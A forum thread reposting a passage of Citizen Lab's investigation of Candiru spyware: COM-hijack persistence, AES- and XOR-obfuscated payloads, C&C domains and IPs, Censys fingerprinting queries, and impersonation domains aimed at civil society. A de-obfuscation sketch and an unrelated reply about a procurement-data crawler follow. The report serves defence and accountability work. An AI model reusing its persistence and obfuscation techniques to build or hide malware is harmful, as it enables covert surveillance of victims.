Normally, this registry key's value points to the benign Windows Management Instrumentation wmiutils.dll file, but the value on the infected computer had been modified to point to a malicious DLL file that had been dropped inside the Windows system folder associated with the Japanese input method (IMEJP): C:\WINDOWS\system32\ime\IMEJP\IMJPUEXP.DLL. This folder is benign and included in a default install of Windows 10, but IMJPUEXP.DLL is not the name of a legitimate Windows component. When Windows boots, it automatically loads the Windows Management Instrumentation service, which involves looking up the DLL path in the registry key, and then invoking the DLL.

Loading the Spyware's Configuration
The IMJPUEXP DLL file has eight blobs in the PE resources section with identifiers 102, 103, 105, 106, 107, 108, 109, 110. The DLL decrypts these using an AES key and IV that are hardcoded in the DLL. Decryption is via the Windows CryptoAPI, using AES-256-CBC.
Of particular note is resource 102, which contains the path to the legitimate wmiutils.dll; this is loaded after the spyware, ensuring that the COM hijack does not disrupt normal Windows functionality. Resource 103 points to a file AgentService.dat in a folder created by the spyware, C:\WINDOWS\system32\config\spp\Licenses\curv\config\tracing\. Resource 105 points to a second file in the same directory, KBDMAORI.dat.
IMJPUEXP.DLL decrypts and loads the AgentService.dat file whose path is in resource 103, using the same AES key and IV, and decompresses it via zlib. The AgentService.dat file then loads the file in resource 105, KBDMAORI.dat, using a second AES key and IV hardcoded in AgentService.dat, and performs the decryption using a statically linked OpenSSL.
Decrypting KBDMAORI.DAT yields a file with a series of nine encrypted blobs, each prefixed with an 8-byte little-endian length field. Each blob is encrypted with the same AES key and IV used to decrypt KBDMAORI.DAT, and is then zlib compressed. The first four encrypted blobs appear to be DLLs from the Microsoft Visual C++ redistributable: vcruntime140.dll, msvcp140.dll, ucrtbase.dll, concrt140.dll. The subsequent blobs are part of the spyware, including components that are apparently called Internals.dll and Help.dll.
Both the Microsoft DLLs and the spyware DLLs in KBDMAORI.DAT are lightly obfuscated. Reverting the following modifications makes the files valid DLLs:
- The first two bytes of the file (MZ) have been zeroed.
- The first 4 bytes of the NT header (\x50\x45\x00\x00) have been zeroed.
- The first 2 bytes of the optional header (\x0b\x02) have been zeroed.
- The strings in the import directory have been XOR obfuscated, using a 48-byte XOR key hardcoded in AgentService.dat: 6604F922F90B65F2B10CE372555C0A0C0C5258B6842A83C7DC2EE4E58B363349F496E6B6A587A88D0164B74DAB9E6B58 (a small de-obfuscation sketch appears at the end of this post).
The final blob in KBDMAORI.DAT is the spyware's configuration in JSON format. The configuration is somewhat obfuscated, but clearly contains Base64 UTF-16 encoded URLs for command-and-control.
Figure 5: The obfuscated spyware's C&C configuration in JSON format.
The C&C servers in the configuration are:
- https://msstore[.]io
- https://adtracker[.]link
- https://cdnmobile[.]io
All three domain names pointed to 185.181.8[.]155. This IP address was connected to three other IPs that matched our Candiru fingerprint CF1 (Section 3).

Spyware Functionality
We are still reversing most of the spyware's functionality, but Candiru's Windows payload appears to include features for exfiltrating files, exporting all messages saved in the Windows version of the popular encrypted messaging app Signal, and stealing cookies and passwords from the Chrome, Internet Explorer, Firefox, Safari, and Opera browsers.
The spyware also makes use of a legitimate signed third-party driver, physmem.sys:
c299063e3eae8ddc15839767e83b9808fd43418dc5a1af7e4f44b97ba53fbd3d
Microsoft's analysis also established that the spyware could send messages from logged-in email and social media accounts directly on the victim's computer. This could allow malicious links or other messages to be sent directly from a compromised user's computer. Proving that the compromised user did not send the message could be quite challenging.

3. Mapping Candiru's Command & Control Infrastructure
To identify the websites used by Candiru's spyware, we developed four fingerprints and a new Internet scanning technique. We searched historical data from Censys and conducted our own scans in 2021. This led us to identify at least 764 domain names that we assess with moderate-high confidence to be used by Candiru and its customers. Examination of the domain names indicates a likely interest in targets in Asia, Europe, the Middle East, and North America. Additionally, based on our analysis of Internet scanning data, we believe that there are Candiru systems operated from Saudi Arabia, Israel, the UAE, Hungary, and Indonesia, among other countries.

An OPSEC Mistake by Candiru Leads to Their Infrastructure
Using Censys, we found a self-signed TLS certificate that included the email address "amitn@candirusecurity.com". We attributed the candirusecurity[.]com domain name to Candiru Ltd. because a second domain name (verification[.]center) was registered in 2015 with a candirusecurity[.]com email address and a phone number (+972-54-2552428) listed by Dun & Bradstreet as the fax number for Candiru Ltd., also known as Saito Tech Ltd.
Figure 6: This Candiru certificate we found on Censys was the starting point of our analysis.
Censys data records that a total of six IP addresses returned this certificate: 151.236.23[.]93, 69.28.67[.]162, 176.123.26[.]67, 52.8.109[.]170, 5.135.115[.]40, 185.56.89[.]66. The latter four of these IP addresses subsequently returned another certificate, which we fingerprinted (Fingerprint CF1) based on distinctive features. We searched Censys data for this fingerprint.
SELECT parsed.fingerprint_sha256
FROM `censys-io.certificates_public.certificates`
WHERE parsed.issuer_dn IS NULL
  AND parsed.subject_dn IS NULL
  AND parsed.validity.length = 8639913600
  AND parsed.extensions.basic_constraints.is_ca
Table 2: Fingerprint CF1

We found 42 certificates on Censys matching CF1. We observed that six IPs matching CF1 certificates later returned certificates that matched a second fingerprint we devised, CF2. The CF2 fingerprint is based on certificates that match those generated by a "fake name" generator. We first ran an SQL query on Censys data for the fingerprint, and then filtered by a list of fake names.

SELECT parsed.fingerprint_sha256, parsed.subject_dn
FROM `censys-io.certificates_public.certificates`
WHERE parsed.subject_dn = parsed.issuer_dn
  AND REGEXP_CONTAINS(parsed.subject_dn, r"^O=[A-Z][a-z]+,,? CN=[a-z]+\.(com|net|org)+$")
  AND parsed.extensions.basic_constraints.is_ca
Table 3: Fingerprint CF2 SQL query

The SQL query yielded 572 results. We filtered the results, requiring the TLS certificate's organization in the parsed.subject_dn field to contain an entry from the list of 475 last names in the Perl Data-Faker module. We suspect that Candiru is using either this Perl module, or another module that uses the same word list, to generate fake names for TLS certificates. Neither the Perl Data-Faker module, nor other similar modules (e.g., the Ruby Faker gem, or the PHP Faker module) appear to have built-in functionality for generating fake TLS certificates. Thus, we suspect that the TLS certificate generation code is custom code written by Candiru. After filtering, we found 542 matching certificates.
We then developed an HTTP fingerprint, called BRIDGE, with which we scanned the Internet, and built a third TLS fingerprint, CF3. We are keeping the BRIDGE and CF3 fingerprints confidential for now in order to maintain visibility into Candiru's infrastructure.

Overlap with CHAINSHOT
One of the IPs that matched our CF1 fingerprint, 185.25.50[.]194, was pointed to by dl.nmcyclingexperience[.]com, which is mentioned as a final URL of a spyware payload delivered by the CHAINSHOT exploit kit in a 2018 report. CHAINSHOT is believed to be linked to Candiru, though no public reports have outlined the basis for this attribution, until now. Kaspersky has observed the UAE hacking group Stealth Falcon using CHAINSHOT, as well as an Uzbekistan-based customer that they call SandCat. While numerous analyses have focused on various CHAINSHOT exploitation techniques, we have not seen any public work that examines Candiru's final Windows payload.

Overlap with Google TAG Research
On 14 July 2021, Google's Threat Analysis Group (TAG) published a report that mentions two Chrome zero-day exploits that TAG observed used against targets (CVE-2021-21166 and CVE-2021-30551). The report mentions nine websites that Google determined were used to distribute the exploits. Eight of these websites pointed to IP addresses that matched our CF3 Candiru fingerprint. We thus believe that the attacks that Google observed involving these Chrome exploits were linked to Candiru. Google also linked a further Microsoft Office exploit they observed (CVE-2021-33742) to the same operator.

Targeting Themes
Examination of Candiru's targeting infrastructure permits us to make guesses about the location of potential targets, and about the topics and themes that Candiru operators believed targets would find relevant and enticing.
Some of the themes strongly suggest that the targeting likely concerned civil society and political activity. This troubling indicator matches Microsoft's observation of the extensive targeting of members of civil society, academics, and the media with Candiru's spyware.
We observed evidence of targeting infrastructure masquerading as media outlets, advocacy organizations, international organizations, and others (see Table 4). We found many aspects of this targeting concerning, such as the domain blacklivesmatters[.]info, which may be used to target individuals interested in or affiliated with this movement. Similarly, infrastructure masquerading as Amnesty International and Refugees International is troubling, as are lookalike domains for the United Nations, the World Health Organization, and other international organizations. We also found the targeting theme of gender studies (e.g. womanstudies[.]co & genderconference[.]org) to be particularly interesting and warranting further investigation.

Theme | Example domain | Masquerading as
International Media | cnn24-7[.]online | CNN
International Media | dw-arabic[.]com | Deutsche Welle
International Media | euro-news[.]online | Euronews
International Media | rasef22[.]com | Raseef22
International Media | france-24[.]news | France 24
Advocacy Organizations | amnestyreports[.]com | Amnesty International
Advocacy Organizations | blacklivesmatters[.]info | Black Lives Matter movement
Advocacy Organizations | refugeeinternational[.]org | Refugees International
Gender Studies | womanstudies[.]co | Academic theme
Gender Studies | genderconference[.]org | Academic conference
Tech Companies | cortanaupdates[.]com | Microsoft
Tech Companies | googlplay[.]store | Google
Tech Companies | apple-updates[.]online | Apple
Tech Companies | amazon-cz[.]eu | Amazon
Tech Companies | drpbx-update[.]net | Dropbox
Tech Companies | lenovo-setup[.]tk | Lenovo
Tech Companies | konferenciya-zoom[.]com | Zoom
Tech Companies | zcombinator[.]co | Y Combinator
Social Media | linkedin-jobs[.]com | LinkedIn
Social Media | faceb00k-live[.]com | Facebook
Social Media | minstagram[.]net | Instagram
Social Media | twitt-live[.]com | Twitter
Social Media | youtubee[.]life | YouTube
Popular Internet Websites | wikipediaathome[.]net | Wikipedia
International Organizations | osesgy-unmissions[.]org | Office of the Special Envoy of the Secretary-General for Yemen
International Organizations | un-asia[.]co | United Nations
International Organizations | whoint[.]co | World Health Organization
Government Contractors | vesteldefnce[.]io | Turkish defense contractor
Government Contractors | vfsglobal[.]fr | Visa services provider
Table 4: Some targeting themes observed in Candiru domains.

A range of targeting domains appears to be reasonably country-specific (see Table 5). We believe these domain themes indicate likely countries of targets, and not necessarily the countries of the operators themselves.

Country | Example domain | What it is likely impersonating
Indonesia | indoprogress[.]co | Left-leaning Indonesian publication
Russia | pochtarossiy[.]info | Russian postal service
Czechia | kupony-rohlik[.]cz | Czech grocery
Armenia | armenpress[.]net | State news agency of Armenia
Iran | tehrantimes[.]org | English-language daily newspaper in Iran
Turkey | yeni-safak[.]com | Turkish newspaper
Cyprus | cyprusnet[.]tk | A portal providing information on Cypriot businesses
Austria | oiip[.]org | Austrian Institute for International Affairs
Palestine | lwaeh-iteham-alasra[.]com | Website that publishes Israeli court indictments of Palestinian prisoners
Saudi Arabia | mbsmetoo[.]com | Website for "an international campaign to support the case of Jamal Khashoggi" and other cases against Saudi Crown Prince Mohammed bin Salman
Slovenia | total-slovenia-news[.]net | English-language Slovenian news site
Table 5: Some country themes observed in Candiru domains.
4. A Saudi-Linked Cluster?
A document was uploaded from Iran to VirusTotal that used an AutoOpen macro to launch a web browser and navigate it to the URL https://cuturl[.]space/lty7uw, which VirusTotal recorded as redirecting to a URL, https://useproof[.]cc/1tUAE7A2Jn8WMmq/api, that mentions a domain we linked to Candiru, useproof[.]cc. The domain useproof[.]cc pointed to 109.70.236.107, which matched our fingerprint CF3. The document was blank, except for a graphic containing the text "Minister of Foreign Affairs of the Islamic Republic of Iran."
Figure 7: A document that loads a Candiru URL was uploaded to VirusTotal from Iran, and includes a header image referencing the Minister of Foreign Affairs.
We fingerprinted the behaviour of cuturl[.]space and traced it to five other URL shorteners: llink[.]link, instagrarn[.]co, cuturl[.]app, url-tiny[.]co, and bitly[.]tel. Interestingly, several of these domains were flagged by a researcher at ThreatConnect in two tweets, based on suspicious characteristics of their registration. We suspect that the AutoOpen format and the URL shorteners may be unique to a particular Candiru client.
A Saudi Twitter user contacted us and reported that Saudi users active on Twitter were receiving messages with suspicious short URLs, including links to the domain name bitly[.]tel. Given this, we suspect that the URL shorteners may be linked to Saudi Arabia.

5. Additional Corporate Details for Candiru
Ya'acov Weitzman (ויצמן יעקב) and Eran Shorer (שורר ערן) founded Candiru in 2014. Isaac Zack (זק יעקב), also reportedly an early investor in NSO Group, became the largest shareholder of Candiru less than two months after its founding and took a seat on its board of directors. In January 2019, Tomer Israeli (ישראלי תומר) first appeared in corporate records as Candiru's "director of finance," and Eitan Achlow (אחלאו איתן) was named CEO.
A number of independent investors appear to have funded Candiru's operations over the years. As of Candiru's notice of allotment of shares filed in February 2021 with the Israeli Corporations Authority, Zack, Shorer, and Weitzman are still the largest shareholders. Three organizations are the next largest shareholders: Universal Motors Israel Ltd. (corporate registration no. 511809071), ESOP Management and Trust Services (איסופ שירותי ניהול, corporate registration no. 513699538), and Optas Industry Ltd.
ESOP (corporate registration no. 513699538) is an Israeli company that provides employee stock program administrative services to corporate clients. We do not know whether ESOP holds its stock in trust for certain Candiru employees.
Optas Industry Ltd. is a Malta-based private equity firm (registration number C91267, shareholder Leonard Joseph O'Brien, directors O'Brien and Michael Ellul, incorporated 28 March 2019). It has been reported that for a decade O'Brien has served as head of investment and a board member of the Gulf Investment Fund, and that the sovereign Qatar Investment Authority has a 12% stake in the Gulf Investment Fund (through a subsidiary, Qatar Holding).
The presence of Universal Motors Israel (company registration no. 511809071) as an investor (including a seat on Candiru's board) is curious, considering that their primary business is the distribution of new and used automobiles. Besides Amit Ron (רון עמית), the Universal Motors Israel representative, Candiru's board as of December 2020 includes Isaac Zack, Ya'acov Weitzman, and Eran Shorer.
In addition to the involvement of Zack, Candiru shares other points of commonality with NSO Group, including representation by the same law firm and the use of the same employee equity and trust administration services company.

6. Conclusion
Candiru's apparent widespread presence, and the use of its surveillance technology against global civil society, is a potent reminder that the mercenary spyware industry contains many players and is prone to widespread abuse. This case demonstrates, yet again, that in the absence of any international safeguards or strong government export controls, spyware vendors will sell to government clients who will routinely abuse their services.
Many governments that are eager to acquire sophisticated surveillance technologies lack robust safeguards over their domestic and foreign security agencies. Many are characterized by poor human rights track records. It is not surprising that, in the absence of strong legal restraints, these types of government clients will misuse spyware services to track journalists, political opposition, human rights defenders, and other members of global civil society.

Civil Society in the Crosshairs… Again
The apparent targeting of an individual because of their political beliefs and activities that are neither terrorist nor criminal in nature is a troubling example of this dangerous situation. Microsoft's independent analysis is also disconcerting: it discovered at least 100 victims of Candiru's malware operations, including "politicians, human rights activists, journalists, academics, embassy workers and political dissidents."
Equally disturbing in this regard is Candiru's registration of domains impersonating human rights NGOs (Amnesty International), legitimate social movements (Black Lives Matter), international health organizations (WHO), women's rights themes, and news organizations. Although we lack context around the specific use cases connected to these domains, their mere presence as part of Candiru's infrastructure, in light of the widespread harms against civil society associated with the global spyware industry, is highly concerning and an area that merits further investigation.

Rectifying Harms around the Commercial Spyware Market
Ultimately, tackling the malpractices of the spyware industry will require a robust, comprehensive approach that goes beyond efforts focused on a single high-profile company or country. Unfortunately, Israel's Ministry of Defense, from whom Israel-based companies like Candiru must receive an export license before selling abroad, has so far proven itself unwilling to subject surveillance companies to the type of rigorous scrutiny that would be required to prevent abuses of the sort we and other organizations have identified. The export licensing process in that country is almost entirely opaque, lacking even the most basic measures of public accountability or transparency. It is our hope that reports such as this one will help spur policymakers and legislators in Israel and elsewhere to do more to prevent the mounting harms associated with an unregulated spyware marketplace.
It is worth noting the growing risks that spyware vendors and their ownership groups themselves face as a result of their own reckless sales. Mercenary spyware vendors like Candiru market their services to their government clients as "untraceable" tools that evade detection and thus prevent their clients' operations from being exposed. However, our research shows once again how specious these claims are.
Although sometimes challenging, it is possible for researchers to detect and uncover targeted espionage using a variety of network monitoring and other investigative techniques, as we have demonstrated in this report (and others like it). Even the most well-resourced surveillance companies make operational mistakes and leave digital traces, making their marketing claims about being stealthy and undetectable highly questionable. To the extent that their products are implicated in significant harms or cases of unlawful targeting, the negative exposure that comes from public interest research may create significant liabilities for the ownership, shareholders, and others associated with these spyware companies.
Finally, this case shows the value of a community-wide approach to investigations into targeted espionage. In order to remedy the harms generated by this industry for innocent members of global civil society, cooperation among academic researchers, network defenders, threat intelligence teams, and technology platforms is critical. Our research drew upon multiple data sources curated by other groups and entities with whom we cooperated, and ultimately helped identify software vulnerabilities in a widely used product, which were reported to and then patched by its vendor.

Acknowledgements
Thanks to Microsoft and the Microsoft Threat Intelligence Center (MSTIC) for their collaboration, and for working to quickly address the security issues identified through their research. We are especially grateful to the targets who make the choice to work with us to help identify and expose the entities involved in targeting them. Without their participation, this report would not have been possible.
Thanks to Team Cymru for providing access to their Pure Signal Recon product. Their tool's ability to show Internet traffic telemetry from the past three months provided the breakthrough we needed to identify the initial victim in Candiru's infrastructure.
Funding for this project was provided by generous grants from the John D. and Catherine T. MacArthur Foundation, the Ford Foundation, the Oak Foundation, the Sigrid Rausing Trust, and the Open Societies Foundation. Thanks to Miles Kenyon, Mari Zhou, and Adam Senft for communications, graphics, and organizational support.
Sursa: https://citizenlab.ca/2021/07/hooking-candiru-another-mercenary-spyware-vendor-comes-into-focus/
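As referenced in the persistence analysis above, a minimal sketch of the import-string de-obfuscation in Python (the 48-byte key is the one quoted in the report; the assumption that it is applied as a repeating-key XOR over the obfuscated bytes is ours, since the report does not spell out the exact application):

import binascii

KEY = binascii.unhexlify(
    "6604F922F90B65F2B10CE372555C0A0C0C5258B6842A83C7"
    "DC2EE4E58B363349F496E6B6A587A88D0164B74DAB9E6B58"
)

def xor_deobfuscate(blob: bytes) -> bytes:
    """Repeating-key XOR: byte i of the blob is XORed with KEY[i % 48]."""
    return bytes(b ^ KEY[i % len(KEY)] for i, b in enumerate(blob))

# XOR is its own inverse, so the same function obfuscates and de-obfuscates:
assert xor_deobfuscate(xor_deobfuscate(b"LoadLibraryW")) == b"LoadLibraryW"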
25. That is, you'd be "attacking" the few people who actually do work in state institutions. If you want to do something truly useful, in my opinion, build a crawler that pulls the documents from SEAP (Sistemul Electronic de Achizitii Publice, Romania's electronic public procurement system) and shows roughly where the money we pay to the state ends up.
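A minimal sketch of such a crawler (hypothetical: the endpoint, parameters, and response fields below are placeholders; the real SEAP portal at e-licitatie.ro would need to be inspected to find its actual search API and schema):

import requests

# Placeholder endpoint; NOT the real SEAP API. Inspect the portal's network
# traffic to find the actual search URL and its parameters.
SEARCH_URL = "https://example.invalid/seap/api/notices"

def fetch_notices(page: int = 0) -> list:
    """Fetch one page of procurement notices as JSON (hypothetical schema)."""
    resp = requests.get(SEARCH_URL, params={"page": page}, timeout=30)
    resp.raise_for_status()
    return resp.json().get("results", [])

if __name__ == "__main__":
    for notice in fetch_notices():
        # Field names are illustrative only.
        print(notice.get("contractingAuthority"), notice.get("value"), notice.get("winner"))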